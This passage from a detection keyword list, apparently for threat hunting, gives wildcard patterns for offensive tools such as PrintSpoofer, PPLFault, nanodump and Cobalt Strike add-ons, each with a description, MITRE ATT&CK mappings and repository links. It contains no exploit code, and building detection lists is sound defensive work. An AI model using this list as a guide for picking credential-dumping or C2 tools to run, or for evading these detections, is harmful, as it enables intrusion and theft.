targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*PPLFault-Localhost-SMB.ps1*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*PPLFaultPayload.dll*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*PPLFaultPayload.dll*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*PPLFaultTemp*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*PPLFaultTemp*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*PPLKiller.exe*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,1,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*PPLKiller.sln*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,1,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*PPLKiller.vcxproj*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,1,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*PPLKiller-master*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,1,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*PppEWCIgXbsepIwnuRIHtQLC*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*ppypykatz.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*praetorian.antihacker*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*praetorian-inc/gato*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,1,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*praetorian-inc/noseyparker*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*praetorian-inc/PortBender*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*pre2k auth * --dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*prepare_ppl_command_line*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*prepareResponseForHiddenAPICall*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*PrimusC2-main.zip*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*print_shtinkering_crash_location*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*printerbug.py *:*@* *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*PrinterNotifyPotato *,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,0,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*PrinterNotifyPotato.*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,1,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*PrintNightmare.*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*printnightmare_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*printspoofer -Command*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*PrintSpoofer-*,offensive_tool_keyword,cobaltstrike,Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crisprss/PrintSpoofer,1,1,N/A,10,10,76,8,2021-10-07T17:45:00Z,2021-10-07T17:28:45Z -*PrintSpoofer.*,offensive_tool_keyword,cobaltstrike,Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crisprss/PrintSpoofer,1,1,N/A,10,10,76,8,2021-10-07T17:45:00Z,2021-10-07T17:28:45Z -*PrintSpoofer.cpp*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer.cpp*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer.exe*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*printspoofer.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*printspoofer.py*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*PrintSpoofer.sln*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer_x64.exe*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*PrintSpoofer32.exe*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer32.exe*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer64.exe*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer64.exe*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer-master*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer-master*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*Priv Esc Check Bof*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*priv/priv_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*privcheck.cna*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*privcheck32*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,1,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*PrivEditor.dll*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*Privesc.psm1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Privesc.tests.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*privesc_checker*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*privesc_checker.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*privesc_juicy_potato.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*privesc_powerup.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*privesc-check*,offensive_tool_keyword,windows-privesc-check,privesc script checker - Windows-privesc-check is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).,T1048 - T1059 - T1088 - T1208,TA0004 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/pentestmonkey/windows-privesc-check,1,1,N/A,N/A,10,1394,336,2023-08-01T07:35:20Z,2015-03-22T13:39:38Z -*PrivescCheck.ps1*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*PrivescCheck_*.*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*PrivescCheckAsciiReport*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*PrivEscManager.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*privexchange.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*privexchange.py*,offensive_tool_keyword,PrivExchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1091.001 - T1101 - T1201 - T1570,TA0006,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*privexchange.py*,offensive_tool_keyword,privexchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1053.005 - T1078 - T1069.002,TA0002 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*PrivExchange-master.zip*,offensive_tool_keyword,privexchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1053.005 - T1078 - T1069.002,TA0002 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/dirkjanm/PrivExchange,1,1,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*PrivFu-main.zip*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z 